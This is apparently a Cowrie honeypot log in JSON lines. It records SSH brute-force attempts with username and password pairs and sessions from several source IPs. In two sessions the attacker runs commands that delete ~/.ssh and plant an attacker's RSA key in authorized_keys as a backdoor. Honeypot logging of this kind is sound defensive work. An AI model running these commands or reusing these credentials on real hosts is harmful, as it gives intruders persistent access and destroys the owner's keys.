openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:49:55.173785Z","src_ip":"158.51.124.56","session":"1a85f553b0be"}
{"eventid":"cowrie.login.failed","username":"jupyterhub","password":"jupyterhub","message":"login attempt [jupyterhub/jupyterhub] failed","sensor":"my-vps","timestamp":"2025-09-08T14:49:55.767805Z","src_ip":"158.51.124.56","session":"1a85f553b0be"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:49:56.909148Z","src_ip":"158.51.124.56","session":"1a85f553b0be"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":40442,"dst_ip":"1.2.3.4","dst_port":22,"session":"91337264cca4","protocol":"ssh","message":"New connection: 185.255.91.51:40442 (1.2.3.4:22) [session: 91337264cca4]","sensor":"my-vps","timestamp":"2025-09-08T14:50:25.158369Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:50:25.163006Z","src_ip":"185.255.91.51","session":"91337264cca4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:50:25.265092Z","src_ip":"185.255.91.51","session":"91337264cca4"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd!!!!","message":"login attempt [root/P@ssw0rd!!!!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:50:25.679708Z","src_ip":"185.255.91.51","session":"91337264cca4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:50:26.016104Z","src_ip":"185.255.91.51","session":"91337264cca4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:50:26.016768Z","src_ip":"185.255.91.51","session":"91337264cca4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:50:26.017515Z","src_ip":"185.255.91.51","session":"91337264cca4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:50:26.146235Z","src_ip":"185.255.91.51","session":"91337264cca4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:50:26.367321Z","src_ip":"185.255.91.51","session":"91337264cca4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:50:26.368069Z","src_ip":"185.255.91.51","session":"91337264cca4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:50:26.471283Z","src_ip":"185.255.91.51","session":"91337264cca4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:50:26.472288Z","src_ip":"185.255.91.51","session":"91337264cca4"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":46596,"dst_ip":"1.2.3.4","dst_port":22,"session":"d437589b7e79","protocol":"ssh","message":"New connection: 185.255.91.51:46596 (1.2.3.4:22) [session: d437589b7e79]","sensor":"my-vps","timestamp":"2025-09-08T14:50:26.550426Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:50:26.551411Z","src_ip":"185.255.91.51","session":"d437589b7e79"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:50:26.643680Z","src_ip":"185.255.91.51","session":"d437589b7e79"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:50:27.055990Z","src_ip":"185.255.91.51","session":"d437589b7e79"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:50:28.150262Z","src_ip":"185.255.91.51","session":"d437589b7e79"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":46600,"dst_ip":"1.2.3.4","dst_port":22,"session":"d607b5c1d77e","protocol":"ssh","message":"New connection: 185.255.91.51:46600 (1.2.3.4:22) [session: d607b5c1d77e]","sensor":"my-vps","timestamp":"2025-09-08T14:50:28.241215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:50:28.242273Z","src_ip":"185.255.91.51","session":"d607b5c1d77e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:50:28.331658Z","src_ip":"185.255.91.51","session":"d607b5c1d77e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:50:28.692579Z","src_ip":"185.255.91.51","session":"d607b5c1d77e"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:50:28.784835Z","src_ip":"185.255.91.51","session":"d607b5c1d77e"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:50:28.796098Z","src_ip":"185.255.91.51","session":"91337264cca4"}
{"eventid":"cowrie.session.connect","src_ip":"2.71.123.41","src_port":39552,"dst_ip":"1.2.3.4","dst_port":23,"session":"9ecde2fb7bb4","protocol":"telnet","message":"New connection: 2.71.123.41:39552 (1.2.3.4:23) [session: 9ecde2fb7bb4]","sensor":"my-vps","timestamp":"2025-09-08T14:50:36.805562Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46567,"dst_ip":"1.2.3.4","dst_port":23,"session":"e67dc5aeccae","protocol":"telnet","message":"New connection: 212.227.235.229:46567 (1.2.3.4:23) [session: e67dc5aeccae]","sensor":"my-vps","timestamp":"2025-09-08T14:50:45.718207Z"}
{"eventid":"cowrie.session.closed","duration":13.874992609024048,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:50:50.680450Z","src_ip":"2.71.123.41","session":"9ecde2fb7bb4"}
{"eventid":"cowrie.session.closed","duration":5.429328441619873,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:50:51.147464Z","src_ip":"212.227.235.229","session":"e67dc5aeccae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34676,"dst_ip":"1.2.3.4","dst_port":22,"session":"61d7f50e1526","protocol":"ssh","message":"New connection: 212.227.235.229:34676 (1.2.3.4:22) [session: 61d7f50e1526]","sensor":"my-vps","timestamp":"2025-09-08T14:50:52.529387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:50:52.530406Z","src_ip":"212.227.235.229","session":"61d7f50e1526"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:50:52.652950Z","src_ip":"212.227.235.229","session":"61d7f50e1526"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx2025","message":"login attempt [root/!QAZ2wsx2025] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:50:53.184721Z","src_ip":"212.227.235.229","session":"61d7f50e1526"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:50:53.484082Z","src_ip":"212.227.235.229","session":"61d7f50e1526"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:50:53.484857Z","src_ip":"212.227.235.229","session":"61d7f50e1526"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:50:53.485782Z","src_ip":"212.227.235.229","session":"61d7f50e1526"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:50:53.609405Z","src_ip":"212.227.235.229","session":"61d7f50e1526"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:50:53.870529Z","src_ip":"212.227.235.229","session":"61d7f50e1526"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:50:53.871466Z","src_ip":"212.227.235.229","session":"61d7f50e1526"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:50:53.996262Z","src_ip":"212.227.235.229","session":"61d7f50e1526"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:50:53.997192Z","src_ip":"212.227.235.229","session":"61d7f50e1526"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34678,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ed477a39119","protocol":"ssh","message":"New connection: 212.227.235.229:34678 (1.2.3.4:22) [session: 1ed477a39119]","sensor":"my-vps","timestamp":"2025-09-08T14:50:54.117970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:50:54.118964Z","src_ip":"212.227.235.229","session":"1ed477a39119"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:50:54.240932Z","src_ip":"212.227.235.229","session":"1ed477a39119"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:50:54.771044Z","src_ip":"212.227.235.229","session":"1ed477a39119"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:50:55.895537Z","src_ip":"212.227.235.229","session":"1ed477a39119"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34690,"dst_ip":"1.2.3.4","dst_port":22,"session":"e51b5e8a605d","protocol":"ssh","message":"New connection: 212.227.235.229:34690 (1.2.3.4:22) [session: e51b5e8a605d]","sensor":"my-vps","timestamp":"2025-09-08T14:50:56.016734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:50:56.017744Z","src_ip":"212.227.235.229","session":"e51b5e8a605d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:50:56.140014Z","src_ip":"212.227.235.229","session":"e51b5e8a605d"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":52022,"dst_ip":"1.2.3.4","dst_port":22,"session":"a28ff6de17d0","protocol":"ssh","message":"New connection: 158.51.124.56:52022 (1.2.3.4:22) [session: a28ff6de17d0]","sensor":"my-vps","timestamp":"2025-09-08T14:50:56.164360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:50:56.165393Z","src_ip":"158.51.124.56","session":"a28ff6de17d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:50:56.304374Z","src_ip":"158.51.124.56","session":"a28ff6de17d0"}
